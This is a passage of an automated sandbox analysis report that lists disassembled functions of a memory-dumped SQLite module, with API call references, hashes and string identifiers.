                                                                          • sqlite3_step.SQLITE3 ref: 609679C3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                          • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                          • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                          • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                          • sqlite3_step.SQLITE3 ref: 60967B94
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                          • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                          • memcmp.MSVCRT ref: 60967D4C
                                                                          • sqlite3_free.SQLITE3 ref: 60967D69
                                                                          • sqlite3_free.SQLITE3 ref: 60967D74
                                                                          • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                          • sqlite3_free.SQLITE3 ref: 60968002
                                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                          • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                          • sqlite3_reset.SQLITE3 ref: 60968035
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                          • sqlite3_step.SQLITE3 ref: 609680D1
                                                                          • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                          • sqlite3_reset.SQLITE3 ref: 60968104
                                                                          • sqlite3_step.SQLITE3 ref: 60968139
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                          • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                            • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                          • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                            • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                            • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                            • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                          • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                          • sqlite3_step.SQLITE3 ref: 6096764C
                                                                          • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                          • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                          • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                          • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                          • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                          • sqlite3_step.SQLITE3 ref: 609690E6
                                                                          • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                          • sqlite3_free.SQLITE3 ref: 60969102
                                                                          • sqlite3_free.SQLITE3 ref: 6096910D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID: $d
                                                                          • API String ID: 2451604321-2084297493
                                                                          • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                          • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                          • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                          • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                          Function 6096A5EE Relevance: 81.5, APIs: 45, Strings: 1, Instructions: 1006COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                          • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                          • sqlite3_step.SQLITE3 ref: 6096A969
                                                                          • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                          • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                          • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                            • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                            • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                            • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                          • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                          • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                          • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                          • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                          • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                          • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                          • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                          • String ID: optimize
                                                                          • API String ID: 1540667495-3797040228
                                                                          • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                          • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                          • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                          • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                          Function 609660FA Relevance: 39.4, APIs: 19, Strings: 3, Instructions: 926COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                          • sqlite3_free.SQLITE3 ref: 60966183
                                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                          • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                          • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                          • memcmp.MSVCRT ref: 6096639E
                                                                            • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                            • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                          • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                          • String ID: ASC$DESC$x
                                                                          • API String ID: 4082667235-1162196452
                                                                          • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                          • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                          • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                          • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                          Function 609687A7 Relevance: 36.3, APIs: 24, Instructions: 282COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                                          • sqlite3_step.SQLITE3 ref: 6096884D
                                                                          • sqlite3_reset.SQLITE3 ref: 60968858
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                                          • sqlite3_step.SQLITE3 ref: 6096892F
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                                          • sqlite3_reset.SQLITE3 ref: 609689B0
                                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                          • sqlite3_free.SQLITE3 ref: 60968A68
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                                          • sqlite3_step.SQLITE3 ref: 60968B38
                                                                          • sqlite3_reset.SQLITE3 ref: 60968B43
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                                          • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                                          • sqlite3_step.SQLITE3 ref: 60968C17
                                                                          • sqlite3_reset.SQLITE3 ref: 60968C22
                                                                          • sqlite3_free.SQLITE3 ref: 60968C2F
                                                                          • sqlite3_free.SQLITE3 ref: 60968C3A
                                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                                            • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                                            • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                                            • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                                            • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                                            • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                                          • String ID:
                                                                          • API String ID: 2526640242-0
                                                                          • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                          • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                                          • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                          • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                                          Function 6096923E Relevance: 29.3, APIs: 19, Instructions: 779COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                          • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                          • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                            • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                            • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                            • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                            • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                          • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                          • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                          • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                          • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                          • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                          • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                          • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                          • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                            • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                          • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                          • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                          • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                          • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                          • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                          • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                          • String ID:
                                                                          • API String ID: 961572588-0
                                                                          • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                          • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                          • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                          • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                          Function 60963143 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                          • String ID: 2$foreign key$indexed
                                                                          • API String ID: 4126863092-702264400
                                                                          • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                          • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                          • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                          • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                          Function 6094A6C5 Relevance: 10.6, APIs: 7, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                          • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                          • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                          • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                          • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                          • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                          • String ID:
                                                                          • API String ID: 2794791986-0
                                                                          • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                          • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                          • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                          • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                          Function 6093323D Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 432COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stricmp
                                                                          • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                          • API String ID: 912767213-1308749736
                                                                          • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                          • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                          • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                          • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                          Function 6094B407 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                          • sqlite3_step.SQLITE3 ref: 6094B496
                                                                          • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                          • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                          • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                            • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                          • String ID:
                                                                          • API String ID: 4082478743-0
                                                                          • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                          • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                          • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                          • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                          Function 6094D33B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                            • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
